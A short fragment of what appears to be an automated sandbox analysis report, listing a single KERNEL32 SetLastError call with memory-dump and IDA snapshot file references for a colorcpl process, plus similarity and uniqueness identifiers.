• SetLastError.KERNEL32(0000007E,04671EF0), ref: 04671C91
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Similarity
• API ID: ErrorLastRead
• String ID:
• API String ID: 4100373531-0
Uniqueness
• Uniqueness Score: -1.00%